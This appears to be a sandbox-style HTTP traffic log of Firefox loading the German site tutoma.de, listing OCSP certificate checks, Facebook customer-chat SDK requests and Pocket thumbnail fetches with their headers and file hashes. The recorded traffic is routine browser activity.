Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4784
Cache-Control: max-age=148920
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Etag: "637e2d20-1d7"
Expires: Fri, 25 Nov 2022 15:44:16 GMT
Last-Modified: Wed, 23 Nov 2022 14:24:32 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash b6e7c5faf2d24e0d958ab10ee95f6791
16b68ad4b4a2776571697dff8edc9369a3c5c451
1431771f6fd4ad8c028d53a7489acc16b829e32e01d92df5e8c923723024b75a
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4784
Cache-Control: max-age=148920
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Etag: "637e2d20-1d7"
Expires: Fri, 25 Nov 2022 15:44:16 GMT
Last-Modified: Wed, 23 Nov 2022 14:24:32 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
connect.facebook.net/de_DE/sdk/xfbml.customerchat.js
157.240.200.14200 OK 92 kB URL HTTP/2 connect.facebook.net/de_DE/sdk/xfbml.customerchat.js
IP 157.240.200.14:0
File type ASCII text, with very long lines (20829)
Hash d096a5403bb19462ee5ad86aed517deb
d8cec606ba02e2e179c8ae86506864f7dbf35870
2c4aab3ba721b4e4d21ce062b64eb1bce4749c6268984ecb8ea75673cbb32031
GET /de_DE/sdk/xfbml.customerchat.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
access-control-expose-headers: X-FB-Content-MD5
x-fb-content-md5: 18956d9025f0fda1fe565af9b50f7993
etag: "e5c6db35fea06e44a79e39ba073733c2"
content-type: application/x-javascript; charset=utf-8
timing-allow-origin: *
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
expires: Wed, 23 Nov 2022 22:32:33 GMT
cache-control: public,max-age=1200,stale-while-revalidate=3600
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
x-fb-rlafr: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-md5: 0JalQDuxlGLuWthq7VF96w==
x-fb-debug: 0LRah8OjaV6TdSKz+/BknBQcuPpk3aiHVcA0FFTkRYISJ7wje09vSbASuEb/Im9PwRaN6gewl8jPxnnZhM5p1A==
content-length: 92460
x-fb-trip-id: 1679558926
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_create&is_loaded_by_facade=true&loading_time=0&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
157.240.200.35200 OK 0 B URL HTTP/2 www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_create&is_loaded_by_facade=true&loading_time=0&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
IP 157.240.200.35:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_create&is_loaded_by_facade=true&loading_time=0&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: HdgdjW4FBJSuGeSbpYN7YjAMuNvy7M+RSql9+zL0A/XRzg5biHFxLYWUYDZiANzHKsjK+uaXBIu+UyXtAu6bLg==
content-length: 0
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_load&is_loaded_by_facade=true&loading_time=176&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136709&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
157.240.200.35200 OK 0 B URL HTTP/2 www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_load&is_loaded_by_facade=true&loading_time=176&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136709&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
IP 157.240.200.35:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent¤t_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_load&is_loaded_by_facade=true&loading_time=176&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136709&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-fb-rlafr: 0
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: ff7/IDsXlPrz+2We11HCIYYjgj3PcexeCk4+7Kbdd4uSeJK+aV5bbq3lfP0soTTNn8sLjrwEYKGi+tcNGowQJA==
content-length: 0
date: Wed, 23 Nov 2022 22:22:16 GMT
priority: u=3,i
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F20f7461d-18d1-4343-9ecb-d68d44ce1ee4.jpeg
34.120.237.76200 OK 7.6 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F20f7461d-18d1-4343-9ecb-d68d44ce1ee4.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 06c6e720bc9900b38e88cd72f739603e
22884cbc78622d6f78c1c3397c9b440946144a99
8675d08e6d8ae5bdedbc7c7ce647f8c6e72cc457917b4ed1856c50b11c2fe88b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F20f7461d-18d1-4343-9ecb-d68d44ce1ee4.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7589
x-amzn-requestid: 533d7650-cb21-4090-a50a-e205adad316d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: brr5zH4qoAMF79Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63748d0b-017f7bf4390eb124097af648;Sampled=0
x-amzn-remapped-date: Wed, 16 Nov 2022 07:11:07 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: nwXP5jm9A2Cl3_-Lm194ycXkeClig1L9hwgUgE8i8NF-Vv2gNfj_4Q==
via: 1.1 95b0ac620fa3a80ee590ecf1cda1c698.cloudfront.net (CloudFront), 1.1 9c675215120a4ade8754c4357ef2f3ea.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 15:14:08 GMT
age: 25689
etag: "22884cbc78622d6f78c1c3397c9b440946144a99"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F559c6770-d162-460d-b372-5ff036a364d6.jpeg
34.120.237.76200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F559c6770-d162-460d-b372-5ff036a364d6.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 9defa28d124bae7e5ef29a1fb165ee02
2afe813f0fefae511064297ccff9a6de548104e8
8cfdd12386dcc87cfd874ed0c2d42cd33ae2a05cb35127f1a94e163d17bd5b31
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F559c6770-d162-460d-b372-5ff036a364d6.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11576
x-amzn-requestid: 9dd2cb2e-de79-4937-b525-05be9d57c03b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: b-IrdFuxoAMFa9g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637bee49-5437ea0f1568967278fe96ad;Sampled=0
x-amzn-remapped-date: Mon, 21 Nov 2022 21:31:53 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: MtH0aETjrojNhxcpN67UwvtC7rWC2A1ACxmD-u-LEd0WB43qBNPu6g==
via: 1.1 b4085435efbe95a420f374958bd145be.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 22:08:18 GMT
age: 839
etag: "2afe813f0fefae511064297ccff9a6de548104e8"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0ea68cc-d723-41ae-8bc2-16e2e422e2aa.jpeg
